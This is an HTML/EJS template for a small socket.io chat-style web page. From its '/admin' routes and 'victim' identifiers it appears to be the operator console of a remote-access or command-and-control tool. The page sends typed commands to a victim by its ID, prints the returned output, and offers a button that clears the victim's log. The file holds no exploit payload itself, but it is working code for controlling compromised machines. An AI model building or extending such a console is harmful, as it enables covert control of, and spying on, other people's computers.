<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <title></title>

    <!-- Latest compiled and minified CSS -->
    <link rel="stylesheet" href="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/css/bootstrap.min.css">

    <!-- jQuery library -->
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.3.1/jquery.min.js"></script>

    <!-- Latest compiled JavaScript -->
    <script src="https://maxcdn.bootstrapcdn.com/bootstrap/3.3.7/js/bootstrap.min.js"></script>

    <style type="text/css">
        * { margin: 0; padding: 0; box-sizing: border-box; }
        body { font: 13px Helvetica, Arial; }
        form { background: #000; padding: 3px; position: fixed; bottom: 10px; width: 90%; left: 5%; }
        form input { border: 0; padding: 10px; width: 80%; margin-right: .5%; }
        #conversation { list-style-type: none; margin: 0; padding: 5%; }
        #conversation li { padding: 5px 10px; }
    </style>
</head>
<body>
    <div class="container">
        <ul id="conversation">

        </ul>

        <form>
            <input type="text" name="message" id="message"/>
            <button class="btn btn-success" id="btn_send">Send</button>
            <a href="/admin/interface/clearlog/<%= data.victim.id %>" class="btn btn-success" id="btn_clear">Clear</a>
            <a href="/admin" class="btn btn-success" id="btn_clear">Dashboard</a>
        </form>
    </div>

    <script src="https://cdn.socket.io/socket.io-1.4.5.js"></script>

    <script type="text/javascript">
        var socket = io.connect("http://localhost:3000");

        socket.on("connect", function(){
            var id = <%- data.victim.id %>;
            socket.emit("adduser", id);
        });

        //Listen update_message event
        socket.on("update_message", function(data){
            var arr = data.message.split('\n');
            arr.forEach(function(mess) {
                /*var arr1 = mess.split(' ');
                var str = "";
                arr1.forEach(function(mess1){
                    str = str + mess1 + " ";
                });*/
                console.log(mess);
                mess = mess.replace(/</g, "&lt").replace(/ /g, "&nbsp");
                $("#conversation").append("<li>" + mess + "</li>");
                //$("#conversation").append("<li>" + "xuong hang" + "</li>");
            });
        });



        $("form").submit(function(){
            //Send message event
            $("#btn_send").click(function(e){
                //get message
                var message = $("#message").val();
                $("#message").val("");

                if(message.trim().length != 0){
                    socket.emit("send_message", message);
                }
            });

            return false;
        });
    </script>
</body>
</html>